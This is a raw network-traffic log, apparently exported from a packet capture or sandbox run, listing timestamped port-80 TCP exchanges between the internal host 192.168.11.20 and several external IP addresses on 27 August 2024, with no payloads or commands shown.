                                                                                  Aug 27, 2024 17:48:01.387556076 CEST804982635.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:48:01.387629032 CEST804982635.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:48:01.450898886 CEST804982635.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:48:01.451034069 CEST4982680192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:48:02.593189001 CEST4982680192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:48:03.612251043 CEST4982780192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:48:03.713675022 CEST804982735.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:48:03.713843107 CEST4982780192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:48:03.719196081 CEST4982780192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:48:03.850480080 CEST804982735.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:48:03.891381025 CEST804982735.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:48:03.891988039 CEST804982735.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:48:03.892086983 CEST4982780192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:48:03.893714905 CEST4982780192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:48:03.995460033 CEST804982735.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:48:09.447587967 CEST4982880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:09.671469927 CEST804982885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:09.671668053 CEST4982880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:09.679625034 CEST4982880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:09.906615973 CEST804982885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:09.906771898 CEST4982880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:11.184850931 CEST4982880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:12.203107119 CEST4982980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:12.426323891 CEST804982985.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:12.426568985 CEST4982980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:12.434484005 CEST4982980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:12.659853935 CEST804982985.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:12.659987926 CEST4982980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:13.949853897 CEST4982980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:14.967498064 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.191550970 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.191833019 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.200889111 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.200937986 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.200989962 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.429493904 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.429632902 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.429682016 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.429946899 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.429964066 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.430154085 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.430154085 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.430371046 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.430450916 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.430541992 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.430612087 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.430762053 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.430963039 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.431101084 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.431168079 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.431442976 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.431638002 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.654354095 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.654401064 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.654544115 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.654593945 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.655484915 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.655623913 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.655690908 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.655746937 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.655869961 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.655917883 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.656016111 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.656040907 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:15.656109095 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.656265020 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.656368017 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.656486988 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.878432989 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.878525972 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.878642082 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.878771067 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.879601002 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.879707098 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.879921913 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.880022049 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.882319927 CEST804983085.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:15.882564068 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:16.714812994 CEST4983080192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:17.732472897 CEST4983180192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:17.956233978 CEST804983185.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:17.956382036 CEST4983180192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:17.961724997 CEST4983180192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:18.187541962 CEST804983185.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:18.187876940 CEST4983180192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:18.189903975 CEST4983180192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:48:18.413553953 CEST804983185.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:48:31.491107941 CEST4983280192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:31.592530966 CEST80498323.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:31.592655897 CEST4983280192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:31.600583076 CEST4983280192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:31.702033997 CEST80498323.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:31.702380896 CEST80498323.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:31.702486992 CEST80498323.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:31.702584982 CEST4983280192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:33.101830959 CEST4983280192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:34.119436979 CEST4983380192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:34.221451998 CEST80498333.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:34.221673965 CEST4983380192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:34.229645967 CEST4983380192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:34.331362009 CEST80498333.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:34.331727028 CEST80498333.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:34.331793070 CEST80498333.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:34.331911087 CEST4983380192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:35.741877079 CEST4983380192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.762064934 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.863392115 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:36.863719940 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.881314039 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.881349087 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.881406069 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.983000994 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:36.983012915 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:36.983105898 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:36.983222008 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:36.983232021 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.983318090 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.983366013 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:36.983536005 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:37.086822033 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086834908 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086843014 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086850882 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086858034 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086865902 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086874008 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086880922 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086889029 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086896896 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086904049 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086911917 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086920023 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086927891 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.086987972 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:37.087038994 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:37.087256908 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:37.196997881 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197016001 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197025061 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197032928 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197041035 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197047949 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197056055 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197063923 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197072029 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197078943 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197087049 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197094917 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197104931 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197113037 CEST80498343.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:37.197277069 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:38.397660971 CEST4983480192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:39.415138960 CEST4983580192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:39.516860962 CEST80498353.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:39.517044067 CEST4983580192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:39.522396088 CEST4983580192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:39.623925924 CEST80498353.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:39.624238968 CEST80498353.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:39.624370098 CEST80498353.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:39.624597073 CEST4983580192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:39.626640081 CEST4983580192.168.11.203.82.56.39
                                                                                  Aug 27, 2024 17:48:39.727965117 CEST80498353.82.56.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:44.863317966 CEST4983680192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:45.195338011 CEST8049836172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:45.195523977 CEST4983680192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:45.206881046 CEST4983680192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:45.538733959 CEST8049836172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:45.539205074 CEST8049836172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:45.539215088 CEST8049836172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:45.539361954 CEST4983680192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:46.708234072 CEST4983680192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:47.725877047 CEST4983780192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:48.049213886 CEST8049837172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:48.049447060 CEST4983780192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:48.061391115 CEST4983780192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:48.384721994 CEST8049837172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:48.385226011 CEST8049837172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:48.385366917 CEST8049837172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:48.385538101 CEST4983780192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:49.566895008 CEST4983780192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:50.584522963 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:50.916059017 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:50.916240931 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:50.929811954 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:50.929861069 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:50.929925919 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:51.261565924 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.261645079 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.261825085 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:51.261888981 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.261898041 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:51.261953115 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:51.262048960 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.262427092 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.262443066 CEST4983880192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:51.262449026 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.262577057 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.593772888 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.593858004 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.594007969 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.594326019 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.594449043 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:51.594456911 CEST8049838172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:53.459001064 CEST4983980192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:53.789486885 CEST8049839172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:53.789632082 CEST4983980192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:53.795021057 CEST4983980192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:54.125672102 CEST8049839172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:54.125811100 CEST8049839172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:54.125912905 CEST8049839172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:48:54.126205921 CEST4983980192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:54.130899906 CEST4983980192.168.11.20172.96.191.39
                                                                                  Aug 27, 2024 17:48:54.461389065 CEST8049839172.96.191.39192.168.11.20
                                                                                  Aug 27, 2024 17:49:00.362385988 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:00.525010109 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:00.525142908 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:00.533078909 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:00.695652008 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.170279980 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.170337915 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.170388937 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.170460939 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:01.170465946 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.170577049 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:01.177611113 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.177710056 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.177721977 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.177882910 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:01.192244053 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.192264080 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.192390919 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:01.198611021 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.198625088 CEST8049840148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:01.198772907 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:02.048520088 CEST4984080192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:03.066267014 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:03.229259014 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:03.229408026 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:03.237301111 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:03.400342941 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:04.751068115 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:04.954287052 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.427855968 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.427947998 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.428066969 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.428075075 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.428087950 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.428127050 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.428289890 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.428289890 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.429672956 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.429780960 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.429887056 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.429938078 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.430002928 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.495407104 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.495419025 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.495598078 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.495598078 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.507567883 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.507740021 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.507898092 CEST8049841148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.508018017 CEST4984180192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.768737078 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.931612015 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:05.931782007 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.940876007 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.940927029 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:05.940974951 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.103809118 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.103981972 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.103986979 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.104172945 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.104258060 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.104343891 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.104682922 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.104851007 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.267220020 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.267389059 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.267436981 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.267488003 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.267700911 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.267836094 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:06.267915964 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.268110037 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.430227041 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.430351019 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.430485964 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.430726051 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.430854082 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:06.430972099 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.268532991 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.268631935 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.268646955 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.268733025 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.268791914 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:07.268925905 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:07.275839090 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.275960922 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.275974035 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.276150942 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:07.290144920 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.290159941 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.290333033 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:07.296720982 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.296854973 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:07.298238039 CEST8049842148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:07.298432112 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:07.453577042 CEST4984280192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:08.471573114 CEST4984380192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:08.634335041 CEST8049843148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:08.634476900 CEST4984380192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:08.639863968 CEST4984380192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:08.802630901 CEST8049843148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:09.210969925 CEST8049843148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:09.211162090 CEST8049843148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:09.211329937 CEST4984380192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:09.215312958 CEST4984380192.168.11.20148.135.49.178
                                                                                  Aug 27, 2024 17:49:09.377897024 CEST8049843148.135.49.178192.168.11.20
                                                                                  Aug 27, 2024 17:49:22.509526968 CEST4984480192.168.11.203.33.130.190
                                                                                  Aug 27, 2024 17:49:22.610229969 CEST80498443.33.130.190192.168.11.20
